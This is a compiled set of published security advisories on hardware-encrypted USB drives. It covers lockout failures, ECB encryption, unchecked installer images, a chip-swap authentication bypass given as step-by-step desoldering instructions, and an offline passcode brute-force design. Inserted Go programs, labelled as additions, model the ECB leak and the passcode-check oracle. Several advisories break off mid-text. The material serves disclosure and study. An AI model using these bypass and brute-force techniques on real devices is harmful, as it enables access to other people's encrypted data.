[FD] [SYSS-2022-004]: Verbatim Keypad Secure USB 3.2 Gen 1 Drive - Expected Behavior Violation (CWE-440) (CVE-2022-28386)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-004
Product:                   Keypad Secure USB 3.2 Gen 1 Drive
Manufacturer:              Verbatim
Affected Version(s):       Part Number #49428
Tested Version(s):         Part Number #49428
Vulnerability Type:        Expected Behavior Violation (CWE-440)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-01-27
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28386
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Keypad Secure is a USB drive with AES 256-bit hardware
encryption and a built-in keypad for passcode entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for passcode input. The USB
Drive does not store passwords in the computer or system's volatile
memory making it far more secure than software encryption. Also, if it
falls into the wrong hands, the device will lock and require
re-formatting after 20 failed passcode attempts."[1]

The security feature of locking the USB drive and requiring it to be
reformatted after 20 failed unlock attempts does not work as specified.



Vulnerability Details:

When analyzing the USB drive Verbatim Keypad Secure, Matthias Deeg found
out that the device will not lock and require reformatting after 20
failed passcode attempts, as described in the product description[1]
and the corresponding user manual[2].

Thus, an attacker with physical access to such a USB drive can try more
passcodes in order to unlock the device.

During the security analysis, SySS could not find out how many failed
passcode attempts would actually lock the device and require
reformatting it, as this device state was never reached.

Additionally, trying to find out the correct passcode by entering
candidates manually or automatically via the provided keypad is rather
inefficient compared to the equally possible offline brute-force attack
described in SySS security advisory SYSS-2022-001[3].



Proof of Concept (PoC):

SySS tried to unlock the Verbatim Keypad Secure USB drive with more than
20 consecutively entered wrong passcodes.

Afterwards, contrary to the product description, the USB drive could
still be successfully unlocked with the correct passcode, and access to
the previously stored data was possible without any issues.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-01-27: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Keypad Secure
    https://www.verbatim-europe.co.uk/en/prod/verbatim-keypad-secure-usb-32-gen-1-drive-64gb-49428/#
[2] Verbatim Keypad Secure USB Manual
    https://www.verbatim-marcom.com/image_Verbatim-49428_Keypad-Secure-USB-User-Manual_548705.pdf
[3] SySS Security Advisory SYSS-2022-001
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-001.txt
[4] SySS Security Advisory SYSS-2022-004
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-004.txt
[5] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en



OpenPGP_signature
Description: OpenPGP digital signature
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinf

[FD] [SYSS-2022-008]: Verbatim Store 'n' Go Secure Portable HDD - Expected Behavior Violation (CWE-440) (CVE-2022-28386)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-008
Product:                   Store 'n' Go Secure Portable HDD
Manufacturer:              Verbatim
Affected Version(s):       GD25LK01-3637-C VER4.0
Tested Version(s):         GD25LK01-3637-C VER4.0
Vulnerability Type:        Expected Behavior Violation (CWE-440)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-01-31
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28386
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Store 'n' Go Secure Portable HDD is a portable USB drive
with AES 256-bit hardware encryption and a built-in keypad for passcode
entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for password input. The SSD
does not store passwords in the computer or system's volatile memory
making it far more secure than software encryption. Also, if it falls
into the wrong hands, the SSD will lock and require re-formatting after
20 failed password attempts."[1]

The security feature of locking the SSD and requiring it to be
reformatted after 20 failed unlock attempts does not work as specified.



Vulnerability Details:

When analyzing the external SSD Verbatim Store 'n' Go Secure Portable
HDD, Matthias Deeg found out that the device will not lock and require
reformatting after 20 failed passcode attempts, as described in the
product description[1] and the corresponding user manual[2].

Thus, an attacker with physical access to such an external SSD can try
more passcodes in order to unlock the device.

During the security analysis, SySS could not find out how many failed
passcode attempts would actually lock the device and require
reformatting it, as this device state was never reached.

Additionally, trying to find out the correct passcode by entering
candidates manually or automatically via the provided keypad is rather
inefficient compared to the equally possible offline brute-force attack
described in SySS security advisory SYSS-2022-005[3].



Proof of Concept (PoC):

SySS tried to unlock the Verbatim Store 'n' Go Secure Portable HDD with
more than 20 consecutively entered wrong passcodes.

Afterwards, contrary to the product description, the external SSD could
still be successfully unlocked with the correct passcode, and access to
the previously stored data was possible without any issues.



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-01-31: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Store 'n' Go Secure Portable HDD
    https://www.verbatim-europe.co.uk/en/prod/store-n-go-portable-ssd-with-keypad-access-256gb-53402/
[2] Verbatim Keypad Secure User Manual
    https://www.verbatim-marcom.com/image_Verbatim-53402_Verbatim-Keypad-Secure-User-Manual-English_422400.pdf
[3] SySS Security Advisory SYSS-2022-005
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-005.txt
[4] SySS Security Advisory SYSS-2022-008
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-008.txt
[5] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en




[FD] [SYSS-2022-010]: Verbatim Executive Fingerprint Secure SSD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28382)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-010
Product:                   Executive Fingerprint Secure SSD
Manufacturer:              Verbatim
Affected Version(s):       GDMSFE01-INI3637-C VER1.1
Tested Version(s):         GDMSFE01-INI3637-C VER1.1
Vulnerability Type:        Use of a Cryptographic Primitive with a Risky
                           Implementation (CWE-1240)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-02-03
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28382
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES
256-bit hardware encryption and a built-in fingerprint sensor for
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time. The drive is compliant with GDPR requirements as
100% of the drive is securely encrypted. The built-in fingerprint
recognition system allows access for up to eight authorised users and
one administrator who can access the device via a password. The SSD
does not store passwords in the computer or system's volatile memory
making it far more secure than software encryption."[1]

Due to the use of an insecure AES encryption mode (Electronic Codebook,
ECB), an attacker may be able to extract information even from
encrypted data, for example by observing repeating byte patterns.



Vulnerability Details:

When analyzing the Verbatim Executive Fingerprint Secure SSD, Matthias
Deeg found out that the firmware of the USB-to-SATA bridge controller
INIC-3637EN uses AES-256 with the ECB (Electronic Codebook) mode.

In this mode of operation, a block cipher like AES always encrypts
identical plaintext blocks, in this case blocks of 16 bytes, to
identical ciphertext blocks.

For some data, for instance bitmap images, this lack of diffusion
across blocks in ECB mode can leak sensitive information even from
encrypted data.

One famous example for this is an ECB-encrypted image of the TUX
penguin, which, for instance, is referenced in the Wikipedia article
about block cipher modes of operation[2] to illustrate this issue.

Thus, the use of the ECB operation mode can put the confidentiality of
specific information at risk, even in an encrypted form.

Additionally, in attack scenarios where an attacker has short-time
physical access to a Verbatim Executive Fingerprint Secure SSD and
later returns it to its legitimate owner, the attacker may be able to
compromise the integrity of the stored data by replacing specific
encrypted 16-byte blocks with other ones, exploiting the fact that
identical 16-byte plaintext blocks always result in identical 16-byte
ciphertext blocks.



Proof of Concept (PoC):

The same 16-byte plaintext pattern was written several times to an
unlocked Verbatim Executive Fingerprint Secure SSD.

When the SSD was then read using another SSD enclosure, the same
16-byte ciphertext pattern could be observed for the corresponding
plaintext data.
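As an added example that is not part of the advisory, the following Go program reproduces this observation with a constructed AES-256 key: the same 16-byte pattern written four times yields three repeated ciphertext blocks in ECB mode and none in CBC mode, and it also shows the block-swapping integrity problem described in the Vulnerability Details. The key, pattern and records are constructed; the ECB loop is spelled out because Go's standard library offers no ECB helper.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"fmt"
)

// ecb runs AES over each 16-byte block on its own, which is what the advisory
// reports for the INIC-3637EN firmware. Go's standard library deliberately has
// no ECB helper, so the block loop is written out here.
func ecb(key, in []byte, decrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(in)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("length %d is not a multiple of %d", len(in), aes.BlockSize)
	}
	op := block.Encrypt
	if decrypt {
		op = block.Decrypt
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += aes.BlockSize {
		op(out[i:i+aes.BlockSize], in[i:i+aes.BlockSize])
	}
	return out, nil
}

func encryptECB(key, plaintext []byte) ([]byte, error)  { return ecb(key, plaintext, false) }
func decryptECB(key, ciphertext []byte) ([]byte, error) { return ecb(key, ciphertext, true) }

// encryptCBC is shown for contrast: chaining under a random IV (returned as
// the first 16 bytes) makes identical plaintext blocks encrypt differently.
func encryptCBC(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	if len(plaintext)%aes.BlockSize != 0 {
		return nil, fmt.Errorf("length %d is not a multiple of %d", len(plaintext), aes.BlockSize)
	}
	out := make([]byte, aes.BlockSize+len(plaintext))
	if _, err := rand.Read(out[:aes.BlockSize]); err != nil {
		return nil, err
	}
	cipher.NewCBCEncrypter(block, out[:aes.BlockSize]).CryptBlocks(out[aes.BlockSize:], plaintext)
	return out, nil
}

// repeatedBlocks counts 16-byte blocks that duplicate an earlier block. On a
// raw read of an encrypted drive this is the observation the PoC describes
// and a cheap indicator that the device encrypts in ECB mode.
func repeatedBlocks(data []byte) int {
	seen := make(map[[aes.BlockSize]byte]bool)
	dups := 0
	for i := 0; i+aes.BlockSize <= len(data); i += aes.BlockSize {
		var b [aes.BlockSize]byte
		copy(b[:], data[i:i+aes.BlockSize])
		if seen[b] {
			dups++
		}
		seen[b] = true
	}
	return dups
}

// swapBlocks returns a copy of data with 16-byte blocks i and j exchanged.
func swapBlocks(data []byte, i, j int) []byte {
	out := append([]byte(nil), data...)
	bi := out[i*aes.BlockSize : (i+1)*aes.BlockSize]
	bj := out[j*aes.BlockSize : (j+1)*aes.BlockSize]
	tmp := append([]byte(nil), bi...)
	copy(bi, bj)
	copy(bj, tmp)
	return out
}

func main() {
	key := bytes.Repeat([]byte{0x42}, 32) // constructed AES-256 key, not the device's
	pattern := []byte("SECRET-PATTERN-!") // 16 bytes, written four times as in the PoC
	plaintext := bytes.Repeat(pattern, 4)
	ecbCT, _ := encryptECB(key, plaintext)
	cbcCT, _ := encryptCBC(key, plaintext)
	fmt.Println("repeated ciphertext blocks, ECB:", repeatedBlocks(ecbCT))     // 3
	fmt.Println("repeated ciphertext blocks, CBC:", repeatedBlocks(cbcCT[16:])) // 0

	// Integrity: exchanging two ECB ciphertext blocks exchanges exactly the two
	// corresponding plaintext blocks, and nothing in the decryption notices.
	records := []byte("user=alice......user=bob........") // two constructed 16-byte records
	ct, _ := encryptECB(key, records)
	dec, _ := decryptECB(key, swapBlocks(ct, 0, 1))
	fmt.Printf("decrypted after swapping blocks 0 and 1: %q\n", dec)
}
```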



Solution:

SySS GmbH is not aware of a solution for the described security issue.



Disclosure Timeline:

2022-02-03: Vulnerability reported to manufacturer
2022-02-11: Vulnerability reported to manufacturer again
2022-03-07: Vulnerability reported to manufacturer again
2022-06-08: Public release of security advisory



References:

[1] Product website for Verbatim Executive Fingerprint Secure SSD
    https://www.verbatim-europe.co.uk/en/prod/executive-fingerprint-secure-ssd-usb-32-gen-1--usb-c-1tb-53657/
[2] Wikipedia article about block cipher mode of operation
    https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation#Electronic_codebook_(ECB)
[3] SySS Security Advisory SYSS-2022-010
    https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-010.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in thi

[FD] [SYSS-2022-013]: Verbatim Executive Fingerprint Secure SSD - Insufficient Verification of Data Authenticity (CWE-345) (CVE-2022-28385)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-013
Product:                   Executive Fingerprint Secure SSD
Manufacturer:              Verbatim
Affected Version(s):       GDMSFE01-INI3637-C VER1.1
Tested Version(s):         GDMSFE01-INI3637-C VER1.1
Vulnerability Type:        Insufficient Verification of Data
                           Authenticity (CWE-345)
Risk Level:                Low
Solution Status:           Open
Manufacturer Notification: 2022-02-03
Solution Date:             -
Public Disclosure:         2022-06-08
CVE Reference:             CVE-2022-28385
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Executive Fingerprint Secure SSD is a USB drive with AES
256-bit hardware encryption and a built-in fingerprint sensor for
unlocking the device with previously registered fingerprints.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time. The drive is compliant with GDPR requirements as
100% of the drive is securely encrypted. The built-in fingerprint
recognition system allows access for up to eight authorised users and
one administrator who can access the device via a password. The SSD
does not store passwords in the computer or system's volatile memory
making it far more secure than software encryption."[1]

Due to missing integrity checks, an attacker can manipulate the content
of the emulated CD-ROM drive containing the Windows and macOS client
software.



Vulnerability Details:

When analyzing the Verbatim Executive Fingerprint Secure SSD, Matthias
Deeg found out that the content of the emulated CD-ROM drive containing
the Windows and macOS client software can be manipulated.

The content of this emulated CD-ROM drive is stored as ISO-9660 image
in the "hidden" sectors of the USB drive that can only be accessed
using special IOCTL commands, or when installing the drive in an
external disk enclosure.

The following output shows, as an example, the content of the ISO-9660
file system:


# mount hidden_sectors.bin /mnt/

# lsd -laR /mnt/
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
drwxr-xr-x root root 4.0 KB Fri Jan  7 16:39:47 2022  ..
.r-xr-xr-x root root  70 B  Wed Aug 14 09:20:40 2019  Autorun.inf
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  MAC
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  Windows

/mnt/MAC:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  setup.app
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  Source

/mnt/MAC/setup.app:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  Contents

/mnt/MAC/setup.app/Contents:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  _CodeSignature
.r-xr-xr-x root root 1.4 KB Thu Oct 24 06:58:18 2019  Info.plist
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  MacOS
.r-xr-xr-x root root   8 B  Thu Oct 24 06:58:18 2019  PkgInfo
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  Resources

/mnt/MAC/setup.app/Contents/_CodeSignature:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
.r-xr-xr-x root root 3.6 KB Thu Oct 24 07:06:02 2019  CodeResources

/mnt/MAC/setup.app/Contents/MacOS:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
.r-xr-xr-x root root  30 KB Thu Oct 24 07:06:02 2019  setup

/mnt/MAC/setup.app/Contents/Resources:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  Base.lproj

/mnt/MAC/setup.app/Contents/Resources/Base.lproj:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  Main.storyboardc

/mnt/MAC/setup.app/Contents/Resources/Base.lproj/Main.storyboardc:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
.r-xr-xr-x root root 445 B  Thu Oct 24 06:58:18 2019  Info.plist
.r-xr-xr-x root root  35 KB Thu Oct 24 06:58:18 2019  MainMenu.nib
.r-xr-xr-x root root 3.5 KB Thu Oct 24 06:58:18 2019  NSWindowController-B8D-0N-5wS.nib
.r-xr-xr-x root root 1.2 KB Thu Oct 24 06:58:18 2019  XfG-lQ-9wD-view-m2S-Jp-Qdl.nib


/mnt/MAC/Source:
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  .
dr-xr-xr-x root root 2.0 KB Wed Apr  1 09:29:50 2020  ..
.r-xr-x

[FD] [SYSS-2022-024]: Lepin EP-KP001 - Violation of Secure Design Principles (CWE-657) (CVE-2022-29948)

2022-06-11 Thread Matthias Deeg

Advisory ID:               SYSS-2022-024
Product:                   EP-KP001
Manufacturer:              Lepin
Affected Version(s):       KP001_V19
Tested Version(s):         KP001_V19
Vulnerability Type:        Violation of Secure Design Principles (CWE-657)
Risk Level:                High
Solution Status:           Open
Manufacturer Notification: 2022-04-12
Solution Date:             -
Public Disclosure:         2022-06-10
CVE Reference:             CVE-2022-29948
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Lepin EP-KP001 is a USB flash drive with AES-256 hardware encryption
and a built-in keypad for passcode entry.

The manufacturer describes the product as follows (see [1]):

"[Safeguard Your Sensitive DATA] With Military Grade Full-disk 256-bit
AES XTS Hardware Encryption to protect your important files. All your
data is protected by hardware encryption, so no one can access your
data without knowing the password."

Due to an insecure design, the Lepin EP-KP001 flash drive is vulnerable
to an authentication bypass attack which enables an attacker to gain
unauthorized access to the stored encrypted data.



Vulnerability Details:

When analyzing the USB flash drive Lepin EP-KP001, Matthias Deeg found
out that it uses an insecure hardware design which allows an attacker
to bypass the password-based user authentication.

The Lepin EP-KP001 consists of the following four main parts:

1. An unknown NAND flash memory chip
2. An Alcor Micro flash disk controller (AU6989SNBL-GTD)
3. An unknown microcontroller (unmarked chip) used as keypad controller
4. A high-speed analog switch (SGM7222)

The encrypted disk partition with the stored user data can be unlocked
by entering the correct passcode via the keypad and pressing the
"unlock" button.

According to the performed analysis, the password-based user
authentication via a passcode of 6 to 14 digits is performed by the
unknown microcontroller.

By replacing this unknown microcontroller on a target device with one
from an attacker-controlled Lepin EP-KP001 whose passcode was known, it
was possible to successfully unlock the targeted Lepin EP-KP001 USB
flash drive and to gain unauthorized access to the stored data in
cleartext.



Proof of Concept (PoC):

A successful authentication bypass attack could be performed via the
following steps:

1. Set a passcode on an attacker-controlled Lepin EP-KP001.

2. Desolder the unmarked microcontroller from the attacker-controlled
   device.

3. Desolder the unmarked microcontroller from the targeted Lepin
   EP-KP001.

4. Solder the unmarked microcontroller from the attacker-controlled
   device on the targeted device.

5. Unlock the targeted device with the initially set and known passcode.



Solution:

SySS is not aware of a security fix for the described security issue.



Disclosure Timeline:

2022-04-12: Vulnerability reported to manufacturer
2022-06-10: Public release of security advisory



References:

[1] Product website for Lepin EP-KP001
https://www.amazon.com/Encrypted-Password-Aluminum-Portable-Protected/dp/B06W5H9GP7/
[2] SySS Security Advisory SYSS-2022-024
https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2022-024.txt
[4] SySS GmbH, SySS Responsible Disclosure Policy
https://www.syss.de/en/responsible-disclosure-policy



Credits:

This security vulnerability was found by Matthias Deeg of SySS GmbH.

E-Mail: matthias.deeg (at) syss.de
Public Key: 
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc

Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB



Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS website.



Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en



OpenPGP_signature
Description: OpenPGP digital signature
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: https://seclists.org/fulldisclosure/

[FD] [SYSS-2022-043]: Verbatim Store 'n' Go Secure Portable SSD - Use of a Cryptographic Primitive with a Risky Implementation (CWE-1240) (CVE-2022-28384)

2022-10-08 Thread Matthias Deeg

Advisory ID:               SYSS-2022-043
Product:                   Store 'n' Go Secure Portable SSD
Manufacturer:              Verbatim
Affected Version(s):       #53402 (GDMSLK02 C-INIC3637-V1.1)
Tested Version(s):         #53402 (GDMSLK02 C-INIC3637-V1.1)
Vulnerability Type:        Use of a Cryptographic Primitive with a Risky
                           Implementation (CWE-1240)
Risk Level:                High
Solution Status:           Fixed
Manufacturer Notification: 2022-06-29
Solution Date:             2022-07
Public Disclosure:         2022-10-07
CVE Reference:             CVE-2022-28384
Author of Advisory:        Matthias Deeg (SySS GmbH)



Overview:

The Verbatim Store 'n' Go Secure Portable SSD is a portable USB drive
with AES 256-bit hardware encryption and a built-in keypad for passcode
entry.

The manufacturer describes the product as follows:

"The AES 256-bit Hardware Encryption seamlessly encrypts all data on the
drive in real-time with a built-in keypad for password input. The hard
drive does not store passwords in the computer or system’s volatile
memory making it far more secure than software encryption. Also, if it
falls into the wrong hands, the hard drive will lock and require
re-formatting after 20 failed password attempts."[1]

Due to an insecure design, the Verbatim Store 'n' Go Secure Portable SSD
is vulnerable to an offline brute-force attack for finding out the
correct passcode and thus gaining unauthorized access to the stored
encrypted data.



Vulnerability Details:

When analyzing the external storage device Verbatim Store 'n' Go Secure
Portable SSD, Matthias Deeg found out that it uses an insecure design
which allows for offline brute-force attacks against the passcode.

The device consists of the following four main parts:

1. An SSD with M.2 form factor
2. A USB-to-SATA bridge controller (INIC-3637EN)
3. An SPI flash memory chip (XT25F01D) containing the firmware of the
   INIC-3637EN
4. A keypad controller (unknown chip, marked "SW611 2201")

For encrypting the data stored on the SSD, the hardware AES engine of
the INIC-3637EN is used. More specifically, AES-256 in ECB (Electronic
Codebook) mode is used for data encryption, which is itself a security
issue, described in SySS security advisory SYSS-2022-044[2].

The cryptographic key for the actual data encryption, the so-called data
encryption key (DEK), is stored in a special sector of the SSD which in
turn is encrypted using AES-256-ECB with a so-called key encryption key
(KEK).

This KEK is generated by the keypad controller and derived from the
entered passcode, which can be between five and twelve digits long.

When the unlock button is pressed on the Verbatim Store 'n' Go Secure
Portable SSD, this generated AES 256-bit key is transmitted via SPI
communication from the keypad controller to the USB-to-SATA bridge
controller INIC-3637EN for configuring the corresponding hardware AES
engine.

For verifying the entered passcode, the firmware of the INIC-3637EN
reads and decrypts the special sector on the SSD with the provided KEK
and checks specific data offsets for the known byte pattern (signature)
"0x20 0x49 0x4E 0x49" which represents the string " INI".

If this byte pattern is found, the entered passcode and the AES key
derived from it are very likely correct, and the firmware gains access
to the decrypted DEK, which can then be used to decrypt the actual SSD
user data.

This design of the Verbatim Store 'n' Go Secure Portable SSD allows for
offline brute-force attacks against the passcode: an attacker can
generate and observe the derived AES keys (KEKs) output by the keypad
for all possible passcodes and then try to decrypt the data of the
specific SSD sector with each of them. If the magic byte pattern " INI"
appears at the expected places in the resulting plaintext, the correct
passcode is found, which then allows for gaining unauthorized access to
the encrypted user data.
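The verification step described above, modelled as an added Go example (not SySS's tool or the INIC-3637EN firmware): the sector layout, the SHA-256 stand-in for the keypad's KEK derivation and the passcode 123456 are constructed assumptions, while the " INI" signature, AES-256-ECB and the 5- to 12-digit passcode range come from the advisory. It shows why the check is an offline oracle and how many candidate passcodes that oracle would have to cover at most.

```go
package main

import (
	"bytes"
	"crypto/aes"
	"crypto/sha256"
	"fmt"
)

// Layout of the constructed "special sector" holding the wrapped DEK. The
// advisory does not give the real offsets, so these positions are assumptions.
const (
	sectorSize = 512
	sigOffset  = 0  // assumed position of the " INI" signature
	dekOffset  = 16 // assumed position of the 32-byte DEK
)

// Byte pattern the INIC-3637EN firmware looks for after decryption (from the advisory).
var iniSignature = []byte{0x20, 0x49, 0x4E, 0x49} // " INI"

// ecbApply runs AES block by block with no chaining, i.e. ECB mode, in
// either direction; each output block depends only on its input block and the key.
func ecbApply(key, in []byte, decrypt bool) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	bs := block.BlockSize()
	if len(in)%bs != 0 {
		return nil, fmt.Errorf("input length %d is not a multiple of %d", len(in), bs)
	}
	out := make([]byte, len(in))
	for i := 0; i < len(in); i += bs {
		if decrypt {
			block.Decrypt(out[i:i+bs], in[i:i+bs])
		} else {
			block.Encrypt(out[i:i+bs], in[i:i+bs])
		}
	}
	return out, nil
}

// deriveKEK stands in for the keypad controller: the KEK is a deterministic
// function of the passcode alone. The real derivation is not disclosed;
// SHA-256 is an assumed placeholder, chosen only to yield a 32-byte key.
func deriveKEK(passcode string) []byte {
	sum := sha256.Sum256([]byte(passcode))
	return sum[:]
}

// buildKeySector constructs the wrapped-DEK sector as the advisory describes:
// the " INI" signature and the DEK, AES-256-ECB-encrypted under the KEK.
func buildKeySector(kek, dek []byte) ([]byte, error) {
	plain := make([]byte, sectorSize)
	copy(plain[sigOffset:], iniSignature)
	copy(plain[dekOffset:], dek)
	return ecbApply(kek, plain, false)
}

// checkKEK models the firmware's passcode verification: decrypt the key sector
// with the candidate KEK and test for " INI" at the expected offset. It needs
// only a copy of the sector and a candidate key, so it is an offline oracle:
// the device's own attempt counter never comes into play.
func checkKEK(kek, sector []byte) (dek []byte, ok bool) {
	plain, err := ecbApply(kek, sector, true)
	if err != nil {
		return nil, false
	}
	if !bytes.Equal(plain[sigOffset:sigOffset+len(iniSignature)], iniSignature) {
		return nil, false
	}
	return plain[dekOffset : dekOffset+32], true
}

// passcodeSpace returns the number of 5- to 12-digit passcodes, i.e. the
// maximum number of candidates such an offline oracle has to cover.
func passcodeSpace() uint64 {
	var total, p uint64 = 0, 10000 // p starts at 10^4
	for digits := 5; digits <= 12; digits++ {
		p *= 10
		total += p
	}
	return total
}

func main() {
	dek := bytes.Repeat([]byte{0xAB}, 32) // constructed DEK
	kek := deriveKEK("123456")
	sector, err := buildKeySector(kek, dek)
	if err != nil {
		panic(err)
	}
	_, okRight := checkKEK(kek, sector)
	_, okWrong := checkKEK(deriveKEK("654321"), sector)
	fmt.Printf("correct passcode accepted: %v, wrong passcode accepted: %v\n", okRight, okWrong)
	fmt.Printf("candidate passcodes the oracle would have to cover: %d\n", passcodeSpace())
}
```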



Proof of Concept (PoC):

For demonstrating the offline brute-force attack, Matthias Deeg
developed a sample brute-forcing software tool which checks the complete
search space of all possible passcodes between five and twelve digits.

The following output exemplarily shows a successful attack.

>VKSCracker.exe
 _   _ _   __ _   __
| | | | | / //  ___| /  __ \  | |
| | | | |/ / \ `--.  | /  \/_ __ __ _  ___| | _ _ __
